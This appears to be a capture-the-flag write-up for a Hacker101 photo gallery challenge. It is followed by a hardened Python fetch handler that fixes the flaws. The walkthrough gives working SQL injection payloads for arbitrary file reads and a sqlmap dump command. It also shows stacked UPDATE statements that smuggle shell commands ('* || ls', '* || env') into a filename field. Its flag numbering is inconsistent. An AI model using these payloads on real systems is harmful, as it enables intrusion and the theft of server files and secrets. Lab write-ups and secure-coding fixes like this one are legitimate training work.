05 – Hacker 101

Photo Gallery

Flag 1)

  • Start off by viewing the page source and you will see the image ids.
  • Next, open fetch?id=1 and you should see the image served directly.
  • Append .1 to the id, i.e. fetch?id=1.1, and it should error out.
  • Now pass some SQL to turn this into an arbitrary file read, using UNION SELECT 'file/adorable.jpg' --
  • This should return the image information; pay close attention to it and you will find another hint that this is running uwsgi-nginx-flask-docker.
  • Change the filename from file/adorable.jpg to uwsgi.ini, as uwsgi will have an ini file for its config.
  • Learn the main file name from this config and use that instead of uwsgi.ini; it should show main.py.
  • Now review main.py.
  • Flag 0 found.

Flag 2)

  • This one is easy. If you use Slackware like I have and installed the source package, you will need to drop the image from sqlmap using a blind injection.
  • sqlmap -u usr/fetch?id=1 --dump
  • Flag 1 is found.

Flag 3)

  • Using remote code execution, rename image 3 to a new name; call it test.
  • Command: fetch?id=1;UPDATE photos SET title='test' WHERE id=3;COMMIT;--
  • Broken image 3 is now named test.
  • Command 2: fetch?id=1;UPDATE photos SET filename='* || ls > test' WHERE id=3;COMMIT;--
  • Check it again with fetch?id=1.1 UNION SELECT 'test' -- and the directory listing should now show.
  • Command 3: fetch?id=1;UPDATE photos SET filename='* || env > test' WHERE id=3;COMMIT;--
  • Run fetch?id=1.1 UNION SELECT 'test' -- again.
  • All 3 flags are now found. Flag 2 is the last one.
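The root cause behind Flag 1 and Flag 3 is the same: the id parameter is spliced into the SQL query (so UNION and stacked UPDATE statements run) and the filename coming back from the database is handed straight to the filesystem. As an added example that is not the challenge's own main.py, here is a hardened fetch handler; it assumes a sqlite3 photos table with id, title and filename columns and an image directory, both constructed inline, and it rejects non-integer ids, binds the id as a parameter, and refuses any filename that resolves outside the image directory.

```python
import os
import sqlite3
import tempfile

# Constructed stand-in for the challenge's image directory and photos table (assumption).
IMAGE_DIR = tempfile.mkdtemp()
os.makedirs(os.path.join(IMAGE_DIR, "file"))
with open(os.path.join(IMAGE_DIR, "file", "adorable.jpg"), "wb") as f:
    f.write(b"\xff\xd8JPEGDATA")

db = sqlite3.connect(":memory:", check_same_thread=False)
db.execute("CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT, filename TEXT)")
db.executemany("INSERT INTO photos VALUES (?, ?, ?)", [
    (1, "Utterly adorable", "file/adorable.jpg"),
    (2, "Purrfect", "file/purrfect.jpg"),          # row exists, file does not
    (3, "Broken", "../../uwsgi.ini"),               # tampered row pointing outside IMAGE_DIR
])


def safe_path(base, relative):
    """Return the absolute path of base/relative if it stays inside base, else None."""
    base = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def fetch_image(raw_id):
    """Hardened fetch?id=...: returns the image bytes, or None on any rejected input.

    Compared with a string-concatenated query this version
    - accepts only a plain integer id ("1.1 UNION SELECT ..." never reaches SQL),
    - binds the id with a placeholder, so a second statement after ';' cannot run,
    - confines the filename read from the database to IMAGE_DIR before opening it.
    """
    if not raw_id.isdigit():
        return None
    row = db.execute("SELECT filename FROM photos WHERE id = ?", (int(raw_id),)).fetchone()
    if row is None:
        return None
    path = safe_path(IMAGE_DIR, row[0])
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        return fh.read()
```

Even if an attacker manages to alter a filename row some other way, the safe_path check keeps the read inside the image directory, which is what stops the uwsgi.ini and main.py reads described above.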